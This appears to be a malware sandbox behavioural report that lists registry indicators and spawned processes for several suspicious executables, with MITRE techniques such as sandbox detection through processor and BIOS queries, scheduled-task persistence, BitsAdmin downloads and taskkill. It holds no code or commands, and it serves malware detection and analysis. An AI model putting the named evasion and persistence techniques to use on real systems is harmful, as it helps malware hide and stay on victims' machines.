Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	4590.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	jdrbfsf
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	rsrbfsf

Checks processor information in registry 2 TTPs 18 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

svchost.exexe3VggU3QswqnlgTx1tHoeRE.exeWerFault.exe25D.exepowershell.exeWerFault.exeDFFC.exearnatic_1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xe3VggU3QswqnlgTx1tHoeRE.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	25D.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	25D.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DFFC.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	powershell.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	arnatic_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	arnatic_1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DFFC.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

6684 schtasks.exe
Delays execution with timeout.exe 5 IoCs
evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid process

1236 timeout.exe
7108 timeout.exe
5268 timeout.exe
580 timeout.exe
8624 timeout.exe
Download via BitsAdmin 1 TTPs 5 IoCs
dropper

BITS Jobs
T1197

Processes:

bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exe

pid process

5612 bitsadmin.exe
7856 bitsadmin.exe
7380 bitsadmin.exe
3936 bitsadmin.exe
4728 bitsadmin.exe

pid	process
6684	schtasks.exe

pid	process
1236	timeout.exe
7108	timeout.exe
5268	timeout.exe
580	timeout.exe
8624	timeout.exe

pid	process
5612	bitsadmin.exe
7856	bitsadmin.exe
7380	bitsadmin.exe
3936	bitsadmin.exe
4728	bitsadmin.exe

Enumerates system info in registry 2 TTPs 7 IoCs

Query Registry

System Information Discovery

Processes:

chrome.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

6400 ipconfig.exe

pid	process
6400	ipconfig.exe

Kills process with taskkill 9 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1916	taskkill.exe
6772	taskkill.exe
7944	taskkill.exe
8772	taskkill.exe
4280	taskkill.exe
1516	taskkill.exe
6832	taskkill.exe
6188	taskkill.exe
5148	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 7 IoCs

adware spyware

Modify Registry

Processes:

browser_broker.exebrowser_broker.exebrowser_broker.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

app.exeapp.exeypYDB0vdoDVBp7hsRzifyKGQ.exeapp.exesvchost.execmd.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	cmd.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	ypYDB0vdoDVBp7hsRzifyKGQ.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exerUNdlL32.eXeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdgeCP.exe

description	ioc	process
Key deleted	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown\BlameModules	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "262144"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\Total = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\allhugenewz.com\ = "959"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fc761b811773d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\acnav.online\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VendorId = "0"
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "143"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "143"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{EL1681II-FO1F-AN2G-81K3-DNI5R86H5R6K}\1 = "2302"	rUNdlL32.eXe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\VersionLow = "0"
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGLockdown\BlameModules\00000000 = "MicrosoftEdgeCP.exe\\wincorlib.DLL\\USER32.dll\\clipc.dll\\WINHTTP.dll\\CRYPTBASE.dll\\msiso.dll\\Windows.UI.dll\\usermgrcli.dll\\msctf.dll\\mrmcorer.dll\\UiaManager.dll\\Windows.Graphics.dll\\E"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore
